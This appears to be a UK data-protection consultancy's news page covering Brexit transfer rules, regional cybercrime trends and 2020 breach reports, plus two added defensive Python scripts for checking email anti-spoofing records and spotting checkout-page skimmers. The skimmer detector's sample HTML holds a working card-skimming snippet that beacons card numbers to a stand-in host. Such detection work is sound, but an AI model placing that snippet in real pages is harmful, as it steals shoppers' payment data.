The UK left the EU on 31 January 2020. The transition period lasts until 31 December 2020. During the transition period the GDPR still applies as if we were still in the EU.

At the end of the transition period the Government intends to bring GDPR into UK law which will then sit alongside the Data Protection Act 2018. If no deal incorporating data protection is agreed then the UK will become a third country. Read on to find out what you must be doing now to prepare for this possibility.

Will I need a representative in the EEA?

At the end of the transition period you will need a representative in the EEA if you are offering goods or services to, or monitoring the behaviour of, any individual within the EEA.

Can I send or receive personal data from the EEA?

The Government has announced it will not restrict personal data transfers from the UK to the EEA. Transfers from the EEA to the UK will be governed by the GDPR's transfer rules. Unless and until the UK obtains adequacy status, which can take some time, an appropriate safeguard must be in place. The most common of these is a specifically worded contract (the Standard Contractual Clauses).

What you need to do to prepare

You must fully understand and map the personal data flows between your organisation and any organisation or individual within the EEA.

Contact us for further information as we have a sister company that can act as your representative in the EEA and prepare any necessary contracts for you. Contact us now for a no obligation quote.

North West Police Trends week commencing 19th July

There were 33 reports across the North West this week. Jobs of note include:

  • A therapy company suffered a compromise of its Office 365 tenant but believes early mitigation stopped any further incidents from occurring.
  • A ransomware or data extortion attack against a wholesaler, rendering its website useless.
  • Compromise of a social housing business's e-mail account for the purpose of sending malicious e-mails to others.

PROTECT – There seems to be a rise once more in reports concerning the compromise of social media accounts for the purposes of fraud. There are also at least two reports of e-mail accounts being compromised to send further phishing and to spread malicious attachments.

Information Courtesy of: The Cyber Resilience Centre for Greater Manchester

EU publishes note for post Brexit Binding Corporate Rules

The European Data Protection Board (formerly the Article 29 Working Party) has issued an Information Note stating that, before the end of the transition period, organisations in the UK that have Binding Corporate Rules, or are applying for them, will need to select another lead Supervisory Authority, as the ICO will no longer be eligible once the UK is outside the EU.

Should you require a representative in the EU contact us as we can arrange this through our company that will remain based in the EU.

Universities hit by Ransomware attack

As news emerges this week that York University paid hackers following a ransomware attack in which personal details of staff and students were stolen, it has been revealed that at least 10 universities have lost data in the same incident. The attack took place in May on Blackbaud, a provider of cloud services to universities.

Russia denies Covid-19 vaccine hacking allegations

Last week we reported about the allegations that Russian hackers, almost certainly state backed, had targeted a number of organisations involved in developing a vaccine.

Russia’s ambassador to the UK stated on the BBC’s Andrew Marr Show, “I don’t believe in this story at all, there is no sense in it.”

Foreign Secretary Dominic Raab said it is “very clear Russia did this”.

Privacy Shield invalidated by European Courts

The Court of Justice of the European Union has ruled Privacy Shield as invalid meaning organisations can no longer rely upon Privacy Shield as a means of transferring personal data to the US. Organisations must immediately implement an appropriate safeguard. Green CDL has extensive experience in implementing appropriate safeguards.

Russian spies target Coronavirus vaccine research

According to the National Cyber Security Centre, Russian hackers, almost certainly backed by Russian intelligence services, have been targeting a number of pharmaceutical and research centres in the UK, US and Canada. These claims have been denied by Dmitry Peskov, President Putin’s Press Secretary.

High profile Twitter accounts hacked in Bitcoin scam

Jeff Bezos, Elon Musk and Bill Gates were just some of the big names targeted by hackers who were able to send out tweets from their accounts promising to double the money of anyone sending them bitcoin. The tweets stated that they were giving back to the community and that anyone sending $1,000 would be sent back $2,000; the tweets also said the offer was only open for 30 minutes. John Green, cyber security lawyer from Green CDL, says a sense of urgency is a classic technique used by scammers and is almost always a red flag.

Twitter confirmed that they were successfully targeted by a co-ordinated social engineering attack allowing the hackers access to Twitter’s internal systems and tools. It is not clear how much the hackers made from this.

Gadget makers face ban on easy to guess passwords

As part of plans for a new UK cyber security law, internet-connected devices will be required to come pre-installed with a unique password or to require the user to set one before use. Quite often devices come with pre-set passwords such as 000000 which are then never changed by users.

Huawei 5G to be removed from UK by 2027

Mobile providers in the UK are being banned from buying new Huawei 5G equipment after 31st December and must remove all of Huawei’s components from the networks by 2027.

1 in 3 employees want to continue to work from home

According to a survey by Halifax of 3,000 employees, 1 in 3 intend to continue working from home after Covid-19 restrictions are lifted. The majority of those questioned thought that working from home is a great opportunity to tackle climate change. Emma Green from Green CDL says: “This is also a great opportunity for hackers to take advantage of, as the surface area organisations must protect has expanded considerably with employees working from home.”

Increased Risk of Cyber-Attacks for pub goers

Pub and restaurant-goers are exposed as establishments require many customers to book online before they arrive and/or to provide their details for contact tracing purposes. A recent survey highlighted that many establishments have failed to put in place measures to protect their domain from email spoofing, and thus from phishing attacks sent in their name. John Green from Green CDL says: “It is essential these establishments take appropriate technical measures to protect the personal data of their customers.”
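As an added illustration of what “measures to protect their domain from email spoofing” means in practice (this is example code written for this page, not anything from the survey or from Green CDL), the script below parses a domain's SPF and DMARC TXT records and classifies its posture. The domain names and records are constructed; a real check would first fetch the TXT records for the domain and for _dmarc.<domain> from DNS.

```python
"""Classify a domain's anti-spoofing posture from its SPF and DMARC TXT records.

Added example. The SAMPLE records below are constructed, not real DNS data,
and the hostnames are fictitious. The redirect= SPF modifier and DMARC
subdomain policy (sp=) are not handled.
"""
import re


def parse_spf(txt_records):
    """Return the qualifier of the SPF 'all' term ('-', '~', '?', '+'),
    or None when there is no single valid SPF record.

    No 'all' term means the record evaluates to neutral (RFC 7208 s.4.7),
    which is reported as '?'.
    """
    spf = [r for r in txt_records if r.lower().startswith("v=spf1")]
    if len(spf) != 1:  # none = unprotected; more than one is invalid
        return None
    for term in spf[0].split()[1:]:
        m = re.fullmatch(r"([-~?+]?)all", term, re.IGNORECASE)
        if m:
            return m.group(1) or "+"
    return "?"


def parse_dmarc(txt_records):
    """Return the DMARC record as a dict of lower-cased tags, or None."""
    recs = [r for r in txt_records if r.lower().startswith("v=dmarc1")]
    if len(recs) != 1:
        return None
    tags = {}
    for part in recs[0].split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_domain(spf_txt, dmarc_txt):
    """Return ('enforced' | 'unprotected', [findings]).

    'enforced' means receivers have been told to quarantine or reject
    spoofed mail for 100% of messages and an SPF record exists that does
    not authorise the whole internet.
    """
    findings = []
    qualifier = parse_spf(spf_txt)
    if qualifier is None:
        findings.append("no SPF record")
    elif qualifier == "+":
        findings.append("SPF ends in +all, which authorises every sender")
    elif qualifier == "?":
        findings.append("SPF has no enforcing 'all' term (neutral)")

    dmarc = parse_dmarc(dmarc_txt)
    policy = None
    if dmarc is None:
        findings.append("no DMARC record: receivers will not act on SPF/DKIM failures")
    else:
        policy = dmarc.get("p", "").lower()
        if policy not in ("quarantine", "reject"):
            findings.append(f"DMARC p={policy or 'missing'} does not block spoofed mail")
        elif dmarc.get("pct", "100") != "100":
            findings.append(f"DMARC pct={dmarc['pct']}: policy applied to only part of the mail")

    enforced = (
        policy in ("quarantine", "reject")
        and dmarc.get("pct", "100") == "100"
        and qualifier not in (None, "+", "?")
    )
    return ("enforced" if enforced else "unprotected"), findings


# Constructed sample records for two fictitious venues (assumption, not real data).
SAMPLE = {
    "unprotected-pub.example": (
        ["v=spf1 include:_spf.mailhost.example ?all"],
        [],
    ),
    "protected-pub.example": (
        ["v=spf1 include:_spf.mailhost.example -all"],
        ["v=DMARC1; p=reject; rua=mailto:dmarc@protected-pub.example"],
    ),
}


def check_all(samples=SAMPLE):
    """Assess every domain in the sample set."""
    return {domain: assess_domain(spf, dmarc) for domain, (spf, dmarc) in samples.items()}


if __name__ == "__main__":
    for domain, (level, findings) in check_all().items():
        print(domain, level, findings)
```

The useful distinction for a venue is between having an SPF record at all and having a DMARC policy of quarantine or reject: without the latter, a receiving mail server is not asked to do anything with a message that fails SPF, so a phishing e-mail “from” the pub's booking address is still delivered.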

This weeks North West cybercrime trends

There were 30 reports across the North West this week. Cyber crimes included: hacking of e-mail accounts to request the purchase of Amazon vouchers; reports of Dharma and Sodinokibi ransomware attacks; a business Facebook account being hacked; Fortnite account hacking; and SIM jacking.

Smartwatch hack could send fake pill reminders to patients

A security flaw has been uncovered in smartwatch software used to help elderly patients. Some of the watches are aimed mainly at dementia patients, and a hacker could send a reminder to “take pills” as often as they wanted to. Emma Green from Green CDL says: “This is very concerning, as a dementia patient could easily take an accidental overdose.” The flaw has been reported to the manufacturer but is yet to be patched.

Apology after Aberdeen police officer’s phone number published

An apology has been made to an Aberdeen police officer after his phone number was published online in a data breach. Personal details of the officer were inadvertently included in an appendix to a report. John Green of Green CDL says: “Sadly, we often see this type of human error in personal data breaches. Ensuring appropriate organisational measures and training are in place can help reduce them.”

NCA infiltrates EncroChat

An estimated 60,000 people, among them up to 10,000 in Britain, subscribed to France-based EncroChat, which has now been taken down. The system operated on customised Android phones and, according to its website, provided “worry-free secure communications”. Customers had access to features such as self-destructing messages that were deleted from the recipient’s device after a set length of time.

The European Commission prepares for the ECJ invalidating Privacy Shield

The ECJ is due to rule on 16th July as to whether Standard Contractual Clauses will continue to be a valid way of transferring personal data to third countries. It may also adopt a position on the Privacy Shield agreement used for transferring personal data to participating US organisations.

Emma Green from Green CDL says “This is not the first time this has happened, the predecessor to Privacy Shield, Safe Harbor, was invalidated by the ECJ back in 2015 leaving many organisations exposed. This led to a number of large organisations being penalised for not adopting the new agreement.”

Home workers targeted by Russian hacker group Evil Corp

As the majority of workers are now working from home due to the current pandemic Russian hacking group Evil Corp have been taking advantage of this sudden change. Organisations had to adapt almost overnight from protecting a single network to protecting hundreds or even thousands of potential openings. Studies have also shown that home workers are more likely to take security less seriously than they would do when working in the office.

Roblox accounts hacked

Users of the online game complained that their profiles had been hacked and were sending messages to other users stating “Ask your parents to vote for Trump this year”. Additionally, avatars were altered and dressed in attire similar to that of Trump supporters. Users have stated they still had access to their accounts and were able to change their avatars back again.

University of California San Francisco admits to paying ransomware

The university has admitted to paying hackers $1.14 million following a ransomware attack on its networks. Companies are increasingly paying to retrieve their data, despite being advised not to by law enforcement agencies, as they see this as their only option. John Green, in-house data protection and cyber security lawyer, says: “Prevention is better than cure, as quite often there is no cure. It is important organisations do all they can to prevent these attacks occurring in the first place; hackers gaining access is often a very simple and easy attack that could have been prevented with basic measures.”

ICO publish Mobile Phone extraction guidance

An interesting read for all you privacy professionals, check out the guidance here:

Cyber Threats Are The Top Insurance Risk

Research carried out by the UK insurance firm Gallagher polled 1,000 UK business leaders in organisations of various sizes; nearly two-fifths (39%) cited cyber-attacks as one of their biggest concerns. Of these, 82% reported that they do not have specialist insurance. Don’t forget that with Cyber Essentials your business receives FREE cyber insurance!

CyberCrime statistics for North West of UK

There has been an increase in ransomware attacks on manufacturers and on a school. An agricultural supplies company was hit with LockBit ransomware; £4,500 was paid.

Australia’s government and institutions targeted in cyber attack

Prime Minister Scott Morrison said the cyber attacks were widespread, covering “all levels of government” as well as essential services and businesses. Mr Morrison did not name specific cases but said the activity had spanned “government, industry, political organisations, education, health, essential service providers and operators of other critical infrastructure”.

Australia targeted by state based cyber attacks

According to Prime Minister Scott Morrison, Australia’s government and various institutions have been targeted in an ongoing, sophisticated state-based cyber-attack. The attacks have been happening over many months and continue to increase. Although Mr Morrison did not name specific departments, he stated that the activity had spanned “government, industry, political organisations, education, health, essential service providers and operators of critical infrastructure.”

Wiggle investigating cyber attack

Online sports retailer Wiggle is investigating a possible cyber attack after a number of complaints from customers that their accounts were showing fake orders they had not placed, or that they had received emails stating their account details had changed. Wiggle has been criticised for its initial poor response to customers but has since placed an announcement, buried deep on its website.

Amazon Web Services (AWS) thwarts largest ever DDoS cyber attack

DDoS attacks are designed to take down websites by flooding them with huge numbers of requests until they crash. According to Amazon it was hit by an incredible 2.3 Tbps of traffic; for comparison, this is around half of all the traffic BT sees on its entire UK network during a normal working day.

1 in 5 experience cyber fraud each year

According to a new report, the Scottish Crime and Justice Survey, 1 in 5 adults who use the internet have experienced some form of cyber fraud.

Foodora data breach affects customers in 14 countries

Online food delivery company Delivery Hero’s Foodora brand has been hit by a data breach affecting over 600,000 customers spanning 14 countries. Although this affected customers in a number of countries across Europe, it appears not to have affected customers in the UK. The company is not yet aware of how the data breach occurred.

Tait Towers Manufacturing hit by data breach

The company, which manufactures equipment for live events, has been hit by a data breach affecting the personal and financial information of its employees. It is understood hackers accessed a server and a number of email accounts. John Green, cyber security lawyer from Green CDL, says: “It is likely the breach occurred as a result of an employee clicking a link or opening an attachment in an email, something that may well have been prevented by proper training of staff.”

Online retailer Claire’s hit by cyber attack

Online retailer Claire’s and its sister company Icing have been hit by a digital skimming attack. Hackers injected malicious code into the checkout pages that intercepted customers’ details as they were entered and diverted the information to a “claires-assets” domain, registered back in March to an unknown third party.
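The mechanics of a digital skimmer are what make it detectable: the injected code has to send the captured card data somewhere, and that destination is a host the shop never chose to load anything from. As an added example (not code from the page, from Claire’s or from any of the investigators), the script below parses a checkout page, collects every external script source and every hostname referenced inside inline scripts, and reports hosts outside the retailer's allowlist. The sample HTML, the allowlist and the lookalike host shop-assets.example are constructed for the example.

```python
"""Flag script sources on a checkout page that are not on the shop's allowlist.

Added example. SAMPLE_HTML, ALLOWLIST and every hostname below are
constructed; shop-assets.example stands in for an attacker's lookalike domain.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class ScriptCollector(HTMLParser):
    """Collect <script src> URLs and hostnames referenced inside inline scripts."""

    def __init__(self):
        super().__init__()
        self.external = []      # src attribute of every external <script>
        self.inline_hosts = []  # hosts found in the body of inline <script> blocks
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        # HTMLParser delivers the raw body of <script> blocks here.
        if self._in_inline_script:
            self.inline_hosts.extend(re.findall(r"https?://([A-Za-z0-9.-]+)", data))


def host_of(url):
    """Hostname of an absolute URL; '' for a same-origin relative path."""
    return (urlparse(url).hostname or "").lower()


def allowed(host, allowlist):
    """True if host is one of the allowlisted domains or a subdomain of one."""
    host = host.lower()
    return any(host == a or host.endswith("." + a) for a in allowlist)


def find_unexpected_hosts(html, allowlist):
    """Return the sorted list of script-related hosts not covered by allowlist."""
    collector = ScriptCollector()
    collector.feed(html)
    hosts = {host_of(u) for u in collector.external} | set(collector.inline_hosts)
    return sorted(h for h in hosts if h and not allowed(h, allowlist))


# Constructed checkout page: one same-origin script, one legitimate CDN script,
# and an inline skimmer that beacons the card number to a lookalike host.
SAMPLE_HTML = """<html><body>
<form><input name="card"></form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.shop.example/lib.js"></script>
<script>
  document.querySelector('form').addEventListener('submit', function () {
    new Image().src = 'https://shop-assets.example/c?d='
      + encodeURIComponent(document.forms[0].card.value);
  });
</script>
</body></html>"""

ALLOWLIST = ["shop.example"]  # assumption: the shop only serves scripts from its own domains


if __name__ == "__main__":
    for host in find_unexpected_hosts(SAMPLE_HTML, ALLOWLIST):
        print("unexpected script host:", host)
```

Run against a copy of the live checkout page on a schedule, this is a crude integrity check: any new host in the output is either a change the developers made or an injection. In the browser the same allowlist is what a Content-Security-Policy header with script-src and connect-src directives enforces, which is the technical measure that stops the exfiltration even when the injection succeeds.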

Card details belonging to customers of Intersport in the Balkans stolen

The company managed to fix the issue within several hours, the attack affected customers in Croatia, Serbia, Slovenia, Montenegro and Bosnia Herzegovina.

50% of remote workers Ignoring cyber security

The current pandemic has brought about a forced change for organisations, as many employees are now working remotely from home. This has left IT security teams far less able to oversee employees and their security practices. According to Tessian, 52% of employees believe that, when they are working from home, they can get away with riskier behaviour, putting businesses at risk of cyber attacks.

John Green, in-house lawyer at Green CDL, says: “It is important that cyber security is, and remains, at the forefront of every employee’s mind both during the lockdown and in the future. It is important now more than ever to ensure all your staff undertake appropriate working-from-home and basic cyber security training at regular intervals.”

Honda’s global operations hit by cyberattack

In a statement the Japanese car manufacturer confirmed that a cyberattack has taken place on the Honda network which has impacted their systems globally. They further said that the virus had spread throughout its network affecting its ability to access computers, servers, emails and other services.

Green CDL and Greater Manchester Police talk Cyber Crime and the Law

A recorded webinar hosted by the Cyber Resilience Centre for Greater Manchester with guest speakers Emma Green from Green CDL, Cyber Security and Data Protection lawyer John Green and DSupt Neil Jones from Greater Manchester Police.

Data Breach on Babylon Health’s GP App

Babylon Health admitted to the breach when it was contacted by one of its users, who discovered he had been given access to dozens of video recordings of other patients’ consultations.

An investigation revealed a number of other users also had access to consultations with others.

The Open Rights Group has instructed lawyers to lodge a formal complaint with the ICO over the test and trace programme

ORG has a number of concerns over the amount of contact data that will be collected and retained by the Government, in particular following Public Health England stating it would retain “personally identifiable” data of those who test positive for 20 years.

Part 2 of interview with the Cyber Resilience Centre for Greater Manchester and Emma Green from Green CDL

In the second video of a series of 8 Emma Green from Green CDL talks about the latest trends in cyber security with the Cyber Resilience Centre for Greater Manchester.

Finland issues 3 fines for data protection breaches

The Office of the Data Protection Ombudsman, Finland’s equivalent of the ICO, has issued three fines:

  • Posti Oy fined €100,000 for not providing sufficient information on data protection rights.
  • Kymen Vesi Oy fined €16,000 for failure to conduct a data protection impact assessment.
  • A third company fined €12,500 for unnecessarily collecting personal data about a job applicant.

Friday 5th June 2020

EasyJet faces Group Litigation Order for data breach

A number of law firms are scrambling to sign up claimants in what will likely prove a very costly breach for EasyJet.

Armed Forces Launches Cyber Regiment

A new dedicated Cyber Regiment, known as the 13th Signal Regiment, has been formally stood up this week in a bid to move the armed forces into the information age. The Regiment will lead the way in protecting frontline operations from cyberattacks.

Test results of Coronavirus patients sent to business by mistake

Dozens of patients of NHS Orkney had their Coronavirus test results and confidential details sent to a local business by mistake, due to “an isolated case of administrative error” according to NHS Orkney.

Anti-racism sites hit by cyberattacks

In the wake of the death of George Floyd, cyberattacks against anti-racism websites have risen 1,120-fold. An increase has also been seen across Government and military websites in the form of DDoS (Distributed Denial of Service) attacks, where attackers flood a website with traffic to the point that it can no longer cope.

Kent PPE firm hit with £800k ransomware attack.

Kent Commercial Services, owned by Kent County Council, has received a demand for £800,000 worth of Bitcoin for stolen data which the hackers threatened to leak on the dark web. According to the firm, no ransom has been paid and no personal data relating to taxpayers was stolen. The ICO has issued the firm with data protection advice.

Google being sued for $5bn for tracking in private mode.

A class action has been launched in the US against Google for allegedly illegally invading users’ privacy by tracking them while they were browsing in ‘private mode’. Users assume their search history isn’t being tracked when using private mode, but this is not the case, as Google admits; Google denies, however, that this is illegal.

London law firm Excello Law, with its lure of compensation of £2,000 or more, is just one of many law firms scrambling to be the first to file for a Group Litigation Order against EasyJet following the data breach announced just a few weeks ago on 19 May.

Since the GDPR came into effect and the Data Protection Act 2018 came into force, the latter specifically stating that a person can sue for distress caused by a breach, a staggering number of law firms have jumped onto data breach claims, claiming to be experts in this field.

Applying for a GLO prematurely can land you in hot water, as happened in Crossley v Volkswagen Aktiengesellschaft, where a firm applied for a GLO prematurely in the VW emissions case and was subsequently ordered to pay the Defendant £450,000 in wasted costs.

Despite this, businesses should be very concerned at this trend, as the costs of any litigation may well considerably dwarf any sanction imposed by the ICO.